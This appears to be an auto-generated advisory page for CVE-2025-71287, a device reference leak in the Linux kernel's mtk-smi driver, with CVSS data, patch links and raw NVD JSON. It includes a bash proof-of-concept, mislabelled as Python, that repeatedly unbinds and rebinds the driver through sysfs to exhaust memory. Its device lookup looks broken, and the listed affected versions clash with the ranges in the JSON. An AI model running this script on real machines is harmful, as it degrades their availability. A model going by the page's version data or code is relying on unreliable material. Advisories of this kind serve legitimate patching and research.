CVE-2025-71287

Description

In the Linux kernel, the following vulnerability has been resolved: memory: mtk-smi: fix device leak on larb probe Make sure to drop the reference taken when looking up the SMI device during larb probe on late probe failure (e.g. probe deferral) and on driver unbind.

CVSS Details

CVSS Score

5.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE

Linux Kernel < v6.12-rc1

Linux Kernel < v6.11.5

Linux Kernel < v6.10.14

Linux Kernel < v6.6.56

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/bin/bash
# PoC Concept: Trigger device leak via bind/unbind operations
# Target: CVE-2025-71287 (Linux Kernel mtk-smi)

# This script attempts to trigger the reference count leak
# by repeatedly unbinding and binding the mtk-smi-larb driver.

DRIVER_SYSFS="/sys/bus/platform/drivers/mtk-smi-larb"

# Find the actual device ID (example, depends on hardware)
DEVICES=$(ls -1 $DRIVER_SYSFS/*.auto/ 2>/dev/null | head -n 1)

if [ -z "$DEVICES" ]; then
    echo "Target device not found."
    exit 1
fi

DEVICE_ID=$(basename $DEVICES)
echo "Targeting device: $DEVICE_ID"

for i in {1..1000}
do
    # Unbind the driver (triggers remove path)
    echo "$DEVICE_ID" > "$DRIVER_SYSFS/unbind" 2>/dev/null

    # Bind the driver (triggers probe path)
    # If probe fails or defers, refcount leaks
    echo "$DEVICE_ID" > "$DRIVER_SYSFS/bind" 2>/dev/null
done

echo "Loop completed. Check kernel log for memory leak warnings or dmesg."

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-71287
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-71287
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-71287/
[4] VulDB https://vuldb.com/cve/CVE-2025-71287
[5] https://git.kernel.org/stable/c/04057b86fdac3d4847913a97dc6552c0bff9b85e
[6] https://git.kernel.org/stable/c/1288bb394d464975cea18f69940f206e235e0fe7
[7] https://git.kernel.org/stable/c/1f23a48ff2b8ab47e514f7c84a4b1dbf9b848168
[8] https://git.kernel.org/stable/c/357e16a7fc9c1fef2ea37dce9bb6b9bcb1d1687d
[9] https://git.kernel.org/stable/c/9dae65913b32d05dbc8ff4b8a6bf04a0e49a8eb6
[10] https://git.kernel.org/stable/c/b9eccd59697f7e1cb9a714501d9af826e7f7e073
[11] https://git.kernel.org/stable/c/f69535b77fa0518ad39870c00dd2995439ed5c34

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-71287", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-06T12:16:27.857", "lastModified": "2026-05-13T18:42:19.490", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmemory: mtk-smi: fix device leak on larb probe\n\nMake sure to drop the reference taken when looking up the SMI device\nduring larb probe on late probe failure (e.g. probe deferral) and on\ndriver unbind."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-401"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.6", "versionEndExcluding": "5.15.203", "matchCriteriaId": "6DEF466E-4528-4E5F-B10F-CA586A94C822"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.167", "matchCriteriaId": "2EDC6BAF-B710-4E26-B6AA-D68922EE7B43"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.6.130", "matchCriteriaId": "C57BB918-DF28-46B3-94F7-144176841267"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.12.77", "matchCriteriaId": "B3D12E00-E42D-4056-B354-BAD4903C03A5"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.17", "matchCriteriaId": "A5E006E4-59C7-43C1-9231-62A72219F2BA"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.6", "matchCriteriaId": "373EEEDA-FAA1-4FB4-B6ED-DB4DD99DBE67"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/04057b86fdac3d4847913a97dc6552c0bff9b85e", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/1288bb394d464975cea18f69940f206e235e0fe7", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/1f23a48ff2b8ab47e514f7c84a4b1dbf9b848168", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/357e16a7fc9c1fef2ea37dce9bb6b9bcb1d1687d", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/9dae65913b32d05dbc8ff4b8a6bf04a0e49a8eb6", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/b9eccd59697f7e1cb9a714501d9af826e7f7e073", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/f69535b77fa0518ad39870c00dd2995439ed5c34", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}